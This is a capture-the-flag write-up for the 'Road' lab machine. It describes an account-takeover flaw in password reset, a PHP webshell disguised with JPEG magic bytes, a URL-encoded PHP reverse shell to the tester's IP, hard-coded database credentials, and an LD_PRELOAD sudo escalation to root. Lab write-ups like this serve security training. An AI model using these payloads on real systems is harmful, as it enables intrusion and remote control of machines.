Road

3ec811ecbcbeb8a350e214ab37263f6c.png

Target IP: 10.10.148.116
Challenge Description: As usual, obtain the user and root flag.


Reconnaissance

6157a10abb8f50d6a8cf8b59012c3587.png
There are two TCP ports open on the target machine: SSH and HTTP, as shown above.

1ba97ba8e863caeecf824659305dafb2.png
Aggressive port scan against the open TCP ports returns the result above. The HTTP application on port 80 looks interesting.


Enumeration

Port 80: HTTP
a39ad55b5e778b0fb98d30c1c25f33f5.png
The webpage above is displayed for this web application.

61ec6d51888e37ddeefff39c9a714504.png
I performed source-code scanning, and found an the login page at http://10.10.148.116/v2/admin/login.html as shown above.

f7b3937d02167e70d316c0dc319b63c0.png
And browsing to http://10.10.148.116/v2/admin/login.html displays the login webpage above. I sprayed different default credentials, such as admin:admin and root:root, but I had no luck. However, I notice it is possible to register an account on this web application.

6b3d9395d10f963d4cd4558cc56f5ba0.png
I tried to create an account using the details above. After pressing the Register button, I got a successful confirmation!

2a07f76949f3bbe8d72d3e17ede78ead.png
I logged into the web application using the credentials I registered with. The webpage above is shown after logging in.

7e5d652ca0df3b48175b040ebfa34abb.png
After some enumeration, I found the interesting information above. I tried to change the profile picture of the new user to see if I can upload a webshell, but I had no luck; however, the admin user has access to this feature! I even obtained the email of the admin user which is admin@sky.thm, as shown above.

1746d16177ab3d24b5f053d79bfe25c6.png
Why does this web-application allow users to change their password directly? Maybe I can change the password of the user admin as I have their email address?

ac66a5e7d98798c71f562e406af6a059.png
Using Burpsuite, I intercepted the POST request to change the password of the new user I created. And then I changed the email field to admin@sky.thm as shown above.

db8f43786d097ba44f44854d7bf7702d.png
After forwarding this request, I got the message above. It looks like the password of user admin@sky.thm has been changed to test.

7b671dd2ef519960fdd0a89d43de2180.png
And bingo! I successfully logged in as the user admin as shown above. I should be able to change the profile picture now.

fabb6362a6648fbc5e65688e061d8f1d.png
I created a simple PHP webshell called php.jpg.phtml. This contains the code aaaa<?php echo system($_GET['cmd']);?>. There are four a at the beginning because I will be using hexeditor to input the magicbytes of JPG header. And I added the FFD8FFE0 bytes in the beginning using hexeditor.

81a3d27d9259886bb6d403786451007b.png
After doing this, running file against the PHP webshell shows it is JPEG image data. This is done to bypass any filtering that is in place on the target system. And then I successfully uploaded this PHP webshell via the change profile picture feature. But where has my webshell been uploaded to?

2202e4e583787a0e1200bf3edd7227c5.png
As shown above, apparently the profile picture images are uploaded to /v2/profileimages/. I found this when viewing the source-code of the profile.php PHP file.

2ee3deb2f77faab0fa86fb78f8e308da.png
And bingo! Browsing to http://10.10.148.116/v2/profileimages/ states Directory listing is diabled.. But inputting the full file name and location provides me access to my webshell, as shown above. I can use the webshell to perform RCE. Time to upgrade this to a reverse shell connection.


Exploitation

53ac3b584726252c30ed335383f6b3b6.png
Now I have a foothold on the target machine with the session as www-data. I started a listener on my machine at port 8443. Since the target machine is already using PHP, I deployed the URL-encoded PHP reverse shell script php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8443%29%3Bexec%28%22bash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27 via the webshell as shown above.


Privilege Escalation

40b653f4ce22ce4e0a9333b7eb4d60d8.png
I noticed the credentials root:ThisIsSecurePassword! is hard-coded in some PHP files. Maybe I can access the MySQL application?

6e592e60ae7c7d8aa83de2d5d583e621.png
Using the credentials root:ThisIsSecurePassword!, I logged in to the MySQL application as the user root as shown above. There is an interesting database called SKY. However, I did not find anything useful here. I tried to spray this password against the user webdeveloper, but I had no luck.

633c3d3ecfacaf99a419dd1fd664788f.png
Running the command ps -auxw shows the mongodb entry above. There is mongo database running on the target machine.

0d2e5fed8a4ddbd2c35b212b560096bb.png
Using the command mongo, I started the mongo database application. I ran the command show databases and it showed me four different databases. After enumerating for some time, I found backup to be the most interesting. This database contains a table called user. And this table contains the password BahamasChapp123!@# of the user webdeveloper, who is also a user on this sytem.

95fc4b1515111fc34bb02fadc6c456a2.png
And bingo! I successfully evelated my privileges to the user webdeveloper from www-data using the password BahamasChapp123!@# now.

b023535b4c4c29bdecbc3f7f4a3996ff.png
Running the command sudo -l shows the information above. The important part is the env_keep+=LD_PRELOAD. This means I can load my own malicious library.

be31534f84c796f19b586da0a28b5a54.png
Over at /tmp, I created the malicious C library file with the name shell.c as shown above.

8b4a07aad1ed7d81fa8bfee96020de9b.png
I compiled the code using the command gcc -fPIC -shared -o shell.so shell.c -nostartfiles, as shown above. And then using the command sudo LD_PRELOAD=/tmp/shell.so sky_backup_utility, I obtained a root shell. GG.


Flags

628fa58b32bf46bc7a230f3a551e9e65.png
The user.txt flag is shown above.

ec37d0093fd6989ea5c4310eb9794cfe.png
The root.txt flag is shown above.